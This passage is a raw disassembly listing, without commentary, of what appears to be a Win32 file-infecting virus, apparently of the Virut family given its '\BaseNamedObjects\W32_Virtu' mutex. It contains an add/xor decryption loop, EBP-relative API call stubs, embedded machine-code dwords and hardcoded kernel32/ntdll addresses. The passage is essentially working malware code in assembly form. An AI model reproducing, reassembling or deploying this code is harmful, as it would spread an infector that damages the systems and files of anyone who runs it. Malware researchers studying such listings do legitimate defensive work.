loc_40C4F8: ; CODE XREF: sub_40C22E+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, ss:byte_40342F[ebp]
test ss:dword_403431[ebp], 10000000h
jz short loc_40C529
add ecx, [ebp+40106Dh]
loc_40C529: ; CODE XREF: sub_40C22E+2F3�j
mov dh, 0
test ss:dword_403431[ebp], 20000h
jnz short loc_40C54B
inc dh
test ss:dword_403431[ebp], 40000h
jnz short loc_40C54B
mov dh, ss:byte_403430[ebp]
loc_40C54B: ; CODE XREF: sub_40C22E+307�j
; sub_40C22E+315�j
test ss:dword_403431[ebp], 4000h
jnz short loc_40C562
loc_40C557: ; CODE XREF: sub_40C22E+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_40C557
jmp short loc_40C56B
; ---------------------------------------------------------------------------
loc_40C562: ; CODE XREF: sub_40C22E+327�j
; sub_40C22E+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_40C562
loc_40C56B: ; CODE XREF: seg002:0040C229�j
; sub_40C22E+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_40C22E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C574 proc near ; CODE XREF: sub_40C22E+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_40C109
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_40C58D: ; CODE XREF: sub_40C038+C5�j
push dword ptr [ebp+40396Eh]
call ss:dword_40353C[ebp]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_40C5B5: ; CODE XREF: sub_40C038+6B�j
; sub_40C038+82�j ...
push dword ptr [ebp+403956h]
call ss:dword_40353C[ebp]
loc_40C5C1: ; CODE XREF: sub_40C038+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_40C574 endp
; ---------------------------------------------------------------------------
dd 0E8h, 16A5D00h, 3349ED81h, 0F0580040h, 8085C10Fh, 85004015h
dd 0C883C3C0h, 0C10FF0FFh, 40158085h, 103DC300h, 75002A00h
dd 7C81661Ch, 716C0C24h, 0E8601375h, 0FFFFFFC4h, 7EE80575h
dd 0E8FFFFFBh, 0FFFFFFD2h, 2DFF2E61h, 12345678h, 25B8h
dd 0A5E86000h, 75FFFFFFh, 24448B39h, 4EB58D30h, 8B004038h
dd 81660850h, 7302063Ah, 685625h, 8B00FF00h, 52006AC4h
dd 0F895FF50h, 83004035h, 3E8108C4h, 5C3F3F5Ch, 0C6830375h
dd 0FB2BE804h, 7FE8FFFFh, 61FFFFFFh, 74B8C3h, 0B1EB0000h
dd 2FB8h, 10E800h, 20C20000h, 30B800h, 3E80000h, 0C2000000h
dd 548D0024h, 2ECD0C24h, 7C00F883h, 0E86019h, 8B000000h
dd 5D302454h, 0ED811A8Bh, 403413h, 0FFE539E8h, 4C261FFh
dd 1030700h, 0EF050206h, 0B27ABD4Eh, 0BC15FF0Fh, 90004954h
dd 40h dup(0)
dd 7C809B47h, 7C8308ADh, 7C910331h, 7C80ADA0h, 3 dup(0)
dd 7C80BDB6h, 7C801A24h, 7C80945Ch, 7C802367h, 7C81042Ch
dd 7C810637h, 7C864B0Fh, 7C80C058h, 7C80E7ECh, 7C81153Ch
dd 7C810A77h, 7C831C45h, 7C80B6A1h, 7C8608FFh, 7C835DCAh
dd 7C8111DAh, 7C812ADEh, 7C801D77h, 7C80B905h, 7C80BB76h
dd 7C8309E1h, 7C863DE5h, 7C863F58h, 7C812782h, 7C831CB8h
dd 7C802442h, 7C810B1Ch, 7C80B974h, 7C809A51h, 7C810D87h
dd 7C90D460h, 7C90D682h, 7C90D754h, 7C90D769h, 7C90D793h
dd 7C90DC55h, 7C90DCFDh, 7C90DD90h, 7C90DEB6h, 7C90EA32h
dd 7C9130C6h, 15h dup(0)
a68:
unicode 0, <68>
dw 0C8F0h
a@ db '@',0
aBasenamedobj_0:
unicode 0, <\BaseNamedObjects\W32_Virtu>,0
dd 0BBh dup(0)
dd 990000h, 14FAh dup(0)
seg002 ends
; Section 4. (virtual address 00012000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00012000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 412000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start